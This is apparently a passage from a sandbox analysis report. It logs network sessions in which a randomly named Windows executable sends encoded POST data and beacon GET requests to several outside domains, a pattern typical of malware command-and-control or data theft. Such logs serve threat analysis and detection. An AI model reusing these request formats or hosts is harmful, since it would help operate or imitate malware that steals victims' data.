                                                                                        Nov 6, 2024 16:02:19.900156021 CET387OUTGET /95c0/?A60d=0qxxa8sZzaTQGsV+IlYRUJribMqFDMjNP0hPtjDvBTL1oNFysxcHk25mntsLFh1aL6dJocQb44ZX+yLzRXP4WstlnU8yga+uYMkloLbvjpkOD6D/HpsAt4GJWXyRqysedQ==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.vehiculargustav.click
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:02:20.672406912 CET423INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 06 Nov 2024 15:02:20 GMT
                                                                                        Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
                                                                                        Content-Length: 203
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 35 63 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /95c0/ was not found on this server.</p></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        45192.168.2.849753208.91.197.27805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:34.262506008 CET642OUTPOST /fjsq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.yushaliu.online
                                                                                        Origin: http://www.yushaliu.online
                                                                                        Referer: http://www.yushaliu.online/fjsq/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 4c 72 78 4c 62 6d 32 50 64 4b 4c 69 77 46 2b 79 72 50 58 49 58 2b 77 63 6e 7a 78 31 58 6b 62 41 35 4b 54 76 68 4a 46 58 39 44 49 66 36 41 56 4a 36 72 73 6e 48 58 39 44 6e 4a 78 6c 55 67 51 46 55 4b 71 41 72 70 66 4e 6c 4e 74 6e 7a 45 63 6d 72 43 2b 5a 53 47 61 49 55 71 66 61 43 44 63 34 4c 4c 63 58 76 55 79 39 4f 42 30 30 42 4e 75 35 6d 34 67 78 41 7a 55 43 61 58 45 69 2f 4a 46 74 79 48 49 50 6a 41 4c 45 7a 45 47 71 63 51 79 42 6b 34 33 54 6b 53 39 49 48 2b 69 30 6c 4c 66 6e 6e 39 32 4f 67 6e 45 33 69 44 50 30 72 42 4b 7a 33 73 6d 2b 7a 78 43 61 4d 49 4f 4c 4a 48 46 66 52 4d 39 50 41 63 59 3d
                                                                                        Data Ascii: A60d=LrxLbm2PdKLiwF+yrPXIX+wcnzx1XkbA5KTvhJFX9DIf6AVJ6rsnHX9DnJxlUgQFUKqArpfNlNtnzEcmrC+ZSGaIUqfaCDc4LLcXvUy9OB00BNu5m4gxAzUCaXEi/JFtyHIPjALEzEGqcQyBk43TkS9IH+i0lLfnn92OgnE3iDP0rBKz3sm+zxCaMIOLJHFfRM9PAcY=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        46192.168.2.849754208.91.197.27805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:36.825593948 CET662OUTPOST /fjsq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.yushaliu.online
                                                                                        Origin: http://www.yushaliu.online
                                                                                        Referer: http://www.yushaliu.online/fjsq/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 4c 72 78 4c 62 6d 32 50 64 4b 4c 69 69 77 75 79 6f 6f 72 49 66 2b 77 64 6f 54 78 31 43 30 61 4a 35 4b 66 76 68 4d 38 4b 39 51 67 66 36 67 6c 4a 6f 2f 41 6e 45 58 39 44 73 70 78 6b 61 41 51 65 55 4b 6d 79 72 73 2f 4e 6c 4a 4e 6e 7a 45 73 6d 72 53 43 65 53 57 61 4b 42 36 66 59 47 44 63 34 4c 4c 63 58 76 55 33 71 4f 43 45 30 42 39 2b 35 6c 5a 67 32 44 7a 55 44 64 58 45 69 75 5a 46 70 79 48 4a 63 6a 42 58 69 7a 47 2b 71 63 52 69 42 6b 74 62 51 75 53 39 4f 5a 4f 6a 72 6c 5a 69 41 6c 66 4f 52 74 6d 31 52 6d 46 2f 42 71 33 37 5a 74 4f 75 34 77 78 71 78 4d 4c 6d 39 4d 77 59 33 4c 76 74 2f 65 4c 50 61 4b 47 57 62 4a 43 78 70 35 4c 68 4d 38 51 6b 38 38 31 76 72
                                                                                        Data Ascii: A60d=LrxLbm2PdKLiiwuyoorIf+wdoTx1C0aJ5KfvhM8K9Qgf6glJo/AnEX9DspxkaAQeUKmyrs/NlJNnzEsmrSCeSWaKB6fYGDc4LLcXvU3qOCE0B9+5lZg2DzUDdXEiuZFpyHJcjBXizG+qcRiBktbQuS9OZOjrlZiAlfORtm1RmF/Bq37ZtOu4wxqxMLm9MwY3Lvt/eLPaKGWbJCxp5LhM8Qk881vr


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        47192.168.2.849755208.91.197.27805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:39.363594055 CET1679OUTPOST /fjsq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.yushaliu.online
                                                                                        Origin: http://www.yushaliu.online
                                                                                        Referer: http://www.yushaliu.online/fjsq/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 4c 72 78 4c 62 6d 32 50 64 4b 4c 69 69 77 75 79 6f 6f 72 49 66 2b 77 64 6f 54 78 31 43 30 61 4a 35 4b 66 76 68 4d 38 4b 39 51 34 66 35 52 46 4a 36 49 55 6e 46 58 39 44 68 4a 78 35 61 41 52 4d 55 4b 50 37 72 73 79 34 6c 50 42 6e 68 58 6b 6d 37 78 61 65 48 6d 61 4b 65 4b 66 64 43 44 64 36 4c 4c 74 2f 76 55 6e 71 4f 43 45 30 42 2f 32 35 7a 34 67 32 46 7a 55 43 61 58 45 75 2f 4a 46 52 79 48 42 4d 6a 43 36 66 7a 58 65 71 66 77 53 42 6d 66 6a 51 30 53 39 4d 59 4f 6a 6a 6c 5a 75 66 6c 66 44 6f 74 6d 41 30 6d 43 4c 42 6d 51 47 55 2f 2b 61 6c 74 54 36 76 4d 59 69 59 4a 43 6f 59 4c 4a 39 48 56 63 76 76 63 69 32 64 44 45 4a 68 78 62 4d 45 6f 42 73 37 37 77 65 71 7a 4e 49 6d 5a 76 36 6a 6e 61 42 41 48 6c 6e 6a 45 4a 72 44 33 38 79 31 42 39 53 45 52 4e 6b 56 56 75 78 44 68 49 76 33 2f 73 76 49 4b 78 4a 4e 58 6f 6d 37 38 53 55 67 36 72 34 50 54 72 6f 53 53 4e 52 67 49 52 44 2b 4c 78 6b 53 6c 39 76 7a 47 2f 48 46 4f 4a 78 51 79 6b 5a 2b 31 6d 45 63 5a 71 54 31 6d 65 65 79 79 76 30 74 49 50 46 44 33 [TRUNCATED]
                                                                                        Data Ascii: A60d=LrxLbm2PdKLiiwuyoorIf+wdoTx1C0aJ5KfvhM8K9Q4f5RFJ6IUnFX9DhJx5aARMUKP7rsy4lPBnhXkm7xaeHmaKeKfdCDd6LLt/vUnqOCE0B/25z4g2FzUCaXEu/JFRyHBMjC6fzXeqfwSBmfjQ0S9MYOjjlZuflfDotmA0mCLBmQGU/+altT6vMYiYJCoYLJ9HVcvvci2dDEJhxbMEoBs77weqzNImZv6jnaBAHlnjEJrD38y1B9SERNkVVuxDhIv3/svIKxJNXom78SUg6r4PTroSSNRgIRD+LxkSl9vzG/HFOJxQykZ+1mEcZqT1meeyyv0tIPFD3jYed3NbTV40lieSArcdZNIpc+hMvzEuPTXGbc44Kq7WgWt23emEfPi8vq9NTOL1gm9zCQYxiPcVokYXe+rF4CXgXCt8bwJukAKNmikZXaE1cyFVT93J6Q8XiEAs7DgbwshqP2g0L/jwwz6Ae9NIhjwMjAPKEE0pIIzqQsCSDWuf6/hUZPEkzcRI28XUiJOI8XanwyHk40rkKNqN8tZVrjJnyLYJBQRHgIz65EcGf6wYANhHi1AA5sPSFJ6SdDMqjk/rVSMbeieynN1rj+VzQ4bmp1aarZPs5OuVCaE51YDyCbPRGHa3RtIyxyrBydsopOSqYGPtC6P2VBuoyK7A8Hg0gRzT8fuJ+XjLnjN2uH7rsbgIna9c6EtVnP3FUqbKV4x4c1A7LNjSz+B8DMRlrGPODxXSupMh8drRxWNiaSVQ4jLSOYzPFyq+ER5ejL/mlBz4CThGW1DtNOn1mDMBoA+/QxHbV7GPM4+0BauU2tgdVGtBMarugfrpr7lKTn3N4B2qnKKOmWU0OZC5NrZJuvZRPIlnG/Nlg9rRutfbYoVScU126pVLLiPHMLxHWAynt4leGpre9iVw0EZzC8qsm5wkN9AWM8A9O5Pq7OEh8Jn1IE6/s3D51m6h8MtTfYgJXeyy2zWB3LjkjFqcJD7Rvz/8lxjnZvU7/B2 [TRUNCATED]


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        48192.168.2.849756208.91.197.27805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:41.907115936 CET381OUTGET /fjsq/?A60d=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSZEPIXc/cFilHIaBazWG3FiJEFNWk2bg6JB0HDDUtnLYhkw==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.yushaliu.online
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:02:42.976943016 CET1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 06 Nov 2024 15:02:42 GMT
                                                                                        Server: Apache
                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                        Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_e9aOsaYU3kKuYcCnH2I/18nX8+3ivsoYfSeY0xgo33EvOXPRFkozVr0P2juUHqvYJV+uDYFnQ7wk2IXTS1h5IA==
                                                                                        Content-Length: 2615
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 65 39 61 4f 73 61 59 55 33 6b 4b 75 59 63 43 6e 48 32 49 2f 31 38 6e 58 38 2b 33 69 76 73 6f 59 66 53 65 59 30 78 67 6f 33 33 45 76 4f 58 50 52 46 6b 6f 7a 56 72 30 50 32 6a 75 55 48 71 76 59 4a 56 2b 75 44 59 46 6e 51 37 77 6b 32 49 58 54 53 31 68 35 49 41 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 [TRUNCATED]
                                                                                        Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_e9aOsaYU3kKuYcCnH2I/18nX8+3ivsoYfSeY0xgo33EvOXPRFkozVr0P2juUHqvYJV+uDYFnQ7wk2IXTS1h5IA=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.yushaliu.online/px.js?ch=1">
                                                                                        Nov 6, 2024 16:02:42.976991892 CET1236INData Raw: 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 79 75 73 68 61 6c 69 75 2e 6f 6e 6c 69 6e 65 2f 70 78 2e 6a 73 3f 63 68 3d 32
                                                                                        Data Ascii: </script><script type="text/javascript" src="http://www.yushaliu.online/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";img
                                                                                        Nov 6, 2024 16:02:42.977005959 CET987INData Raw: 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74
                                                                                        Data Ascii: ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"></head><body><div id="partner"></div><script type="t


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        49192.168.2.8497573.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:48.054140091 CET657OUTPOST /ucmb/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.marketprediction.app
                                                                                        Origin: http://www.marketprediction.app
                                                                                        Referer: http://www.marketprediction.app/ucmb/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 69 6e 36 79 75 2f 59 46 2b 39 44 54 2f 74 50 34 77 36 76 6b 72 57 47 54 57 45 51 50 39 50 7a 33 4c 42 75 7a 46 41 6a 4b 73 66 64 75 7a 4a 6e 50 4f 4f 31 72 62 75 58 32 34 39 31 72 65 61 47 77 6d 43 78 6a 72 4c 74 69 61 50 65 61 77 48 50 45 4d 50 76 79 31 54 69 2b 5a 76 36 54 76 35 6d 72 6c 34 4e 45 70 53 68 74 46 58 62 38 6d 30 6d 50 37 74 57 31 4b 46 5a 36 39 63 62 44 33 6d 52 4a 67 66 39 45 77 59 61 52 73 34 4e 58 7a 51 34 32 48 36 6b 39 5a 6d 4d 67 33 4f 35 41 2b 39 2b 38 53 39 4c 44 59 47 4b 75 6a 67 33 49 74 4e 4e 56 70 58 47 57 73 71 57 5a 46 46 36 5a 46 76 6c 57 48 69 77 35 31 69 63 3d
                                                                                        Data Ascii: A60d=in6yu/YF+9DT/tP4w6vkrWGTWEQP9Pz3LBuzFAjKsfduzJnPOO1rbuX2491reaGwmCxjrLtiaPeawHPEMPvy1Ti+Zv6Tv5mrl4NEpShtFXb8m0mP7tW1KFZ69cbD3mRJgf9EwYaRs4NXzQ42H6k9ZmMg3O5A+9+8S9LDYGKujg3ItNNVpXGWsqWZFF6ZFvlWHiw51ic=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        50192.168.2.8497583.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:50.599817991 CET677OUTPOST /ucmb/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.marketprediction.app
                                                                                        Origin: http://www.marketprediction.app
                                                                                        Referer: http://www.marketprediction.app/ucmb/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 69 6e 36 79 75 2f 59 46 2b 39 44 54 35 4e 2f 34 6a 4e 54 6b 73 32 47 51 54 45 51 50 7a 76 7a 73 4c 42 71 7a 46 42 6e 61 73 73 31 75 32 63 44 50 50 50 31 72 65 75 58 32 7a 64 31 69 55 36 47 75 6d 43 39 42 72 4b 52 69 61 4f 36 61 77 47 2f 45 4d 2b 76 78 7a 44 69 47 52 50 36 52 78 4a 6d 72 6c 34 4e 45 70 53 6b 36 46 58 44 38 6d 45 57 50 36 4d 57 30 4d 31 5a 39 72 4d 62 44 6d 32 52 4e 67 66 39 79 77 64 37 4d 73 36 46 58 7a 53 77 32 48 72 6b 2b 51 6d 4d 6d 34 75 34 63 78 4f 37 33 65 74 4c 63 55 31 79 4a 68 7a 66 32 68 62 38 2f 7a 31 4f 51 76 71 2b 79 46 47 53 76 41 59 34 2b 64 42 67 4a 72 31 49 65 35 4a 79 62 6d 68 42 79 45 43 33 46 39 68 71 70 30 71 41 36
                                                                                        Data Ascii: A60d=in6yu/YF+9DT5N/4jNTks2GQTEQPzvzsLBqzFBnass1u2cDPPP1reuX2zd1iU6GumC9BrKRiaO6awG/EM+vxzDiGRP6RxJmrl4NEpSk6FXD8mEWP6MW0M1Z9rMbDm2RNgf9ywd7Ms6FXzSw2Hrk+QmMm4u4cxO73etLcU1yJhzf2hb8/z1OQvq+yFGSvAY4+dBgJr1Ie5JybmhByEC3F9hqp0qA6


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        51192.168.2.8497593.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:53.145545006 CET1694OUTPOST /ucmb/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.marketprediction.app
                                                                                        Origin: http://www.marketprediction.app
                                                                                        Referer: http://www.marketprediction.app/ucmb/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 69 6e 36 79 75 2f 59 46 2b 39 44 54 35 4e 2f 34 6a 4e 54 6b 73 32 47 51 54 45 51 50 7a 76 7a 73 4c 42 71 7a 46 42 6e 61 73 71 74 75 32 4b 50 50 4f 73 64 72 64 75 58 32 2b 39 31 76 55 36 48 79 6d 42 4e 46 72 4b 63 66 61 4e 53 61 77 6b 33 45 64 37 50 78 39 44 69 47 64 76 36 63 76 35 6d 2b 6c 37 31 49 70 54 55 36 46 58 44 38 6d 47 4f 50 38 64 57 30 58 31 5a 36 39 63 62 31 33 6d 52 31 67 66 46 69 77 64 2f 63 74 4f 4a 58 79 79 67 32 46 5a 4d 2b 52 47 4d 6b 2f 75 34 55 78 4a 7a 34 65 74 57 6c 55 30 47 7a 68 77 2f 32 69 38 68 51 67 30 57 56 73 6f 2b 62 62 30 6a 4b 4d 35 34 49 55 6e 38 64 33 48 77 76 2b 4a 36 49 70 43 35 7a 42 79 4b 55 6d 56 61 6b 35 39 39 47 51 64 68 32 31 45 74 38 66 72 63 65 4d 2f 67 53 4f 6f 34 4d 56 7a 38 34 56 68 31 2b 48 72 30 4a 76 64 59 33 38 42 48 54 37 46 63 68 4c 56 4c 54 54 71 51 31 4d 66 63 50 5a 4e 75 4c 6c 65 61 79 64 4d 62 33 4e 35 59 33 51 37 56 35 32 75 61 41 79 42 31 5a 6e 55 32 67 67 62 6b 43 5a 39 32 4c 32 31 53 35 58 4a 71 58 63 69 4d 63 42 4f 4e 52 46 [TRUNCATED]
                                                                                        Data Ascii: A60d=in6yu/YF+9DT5N/4jNTks2GQTEQPzvzsLBqzFBnasqtu2KPPOsdrduX2+91vU6HymBNFrKcfaNSawk3Ed7Px9DiGdv6cv5m+l71IpTU6FXD8mGOP8dW0X1Z69cb13mR1gfFiwd/ctOJXyyg2FZM+RGMk/u4UxJz4etWlU0Gzhw/2i8hQg0WVso+bb0jKM54IUn8d3Hwv+J6IpC5zByKUmVak599GQdh21Et8frceM/gSOo4MVz84Vh1+Hr0JvdY38BHT7FchLVLTTqQ1MfcPZNuLleaydMb3N5Y3Q7V52uaAyB1ZnU2ggbkCZ92L21S5XJqXciMcBONRFZ6hzdD9XsWVFrRBRWMJYvMOwqWIL7vHJumQiCY3kj+IUFk7uABxeheKrxJ/X1e2oEZPMa3oZ9rNCNU/hq9kNme320RCHeIJeZtWkQB9ekA3OSUvPVzg8zC1gah+w7fQbng6e+DJvmCEZ7sOt6Os8vP+nDOplXjC6/x3NM3t95hmAOM0WUdGn4YJeIwxiqpyUDhNRmavzb1Uc6LxMnOQdnIdFpAOnfP0jU9JcCH8/GLqsjTm7OnR8wS9OTFS3SHnDlmFqPE8iPx9ae2nlItGOk+9qgdKhMSRfAzknA6fv7Tc5s2Wpm/L7Gixg6UQy12+TxW++esz2P5T4mw1B28ermBmajGRXTFb+cXQoSgbjOWcPQX7UkuLRxVruL245kv5KotjMy3DTfuyJiH0w2MNjt6Zti4lWuTVK/2mP8Q+iGm9TOtaK0W7xFy04GF7xssOOGyUbIvJPciZFsN1qp00pPcV0vBNsmCUMBYsuvmr/EjBP8882U7O9GBUN6ppMIIfAYS9G8Y7t3ba/hMIUPCyFUikZm66WWoDg0XBAeMo801T/f1/mDyEjehgVvLb00N/cZozzdPKOzF65HNVCbs8VwgVJWCJl+3H0hjC6l8I4Vo/5NfHgg9hEnvTeYVJRhNEDHT5xFu+1j0M1Av7TxP/cltB0s3qaP0X81X [TRUNCATED]


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        52192.168.2.8497603.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:02:55.693525076 CET386OUTGET /ucmb/?QftlZ=CnaPg8j&A60d=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLyg6sZMK+n6SnxPYLsSNnFHqgmG+z3/fMKl0erdP4+1Q9hQ== HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.marketprediction.app
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:02:56.323554993 CET406INHTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 06 Nov 2024 15:02:56 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 266
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 66 74 6c 5a 3d 43 6e 61 50 67 38 6a 26 41 36 30 64 3d 76 6c 53 53 74 50 67 59 69 2f 72 77 30 2b 2b 73 36 5a 4b 55 73 48 2b 6c 54 32 64 70 6a 4f 79 71 4b 6d 62 66 54 68 32 57 68 36 42 43 6d 59 48 68 43 39 68 31 44 4d 62 62 33 37 64 70 50 5a 2f 31 6d 42 4a 73 76 49 49 36 44 4d 47 5a 2f 6e 44 35 4c 66 6e 4c 79 67 36 73 5a 4d 4b 2b 6e 36 53 6e 78 50 59 4c 73 53 4e 6e 46 48 71 67 6d 47 2b 7a 33 2f 66 4d 4b 6c 30 65 72 64 50 34 2b 31 51 39 68 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
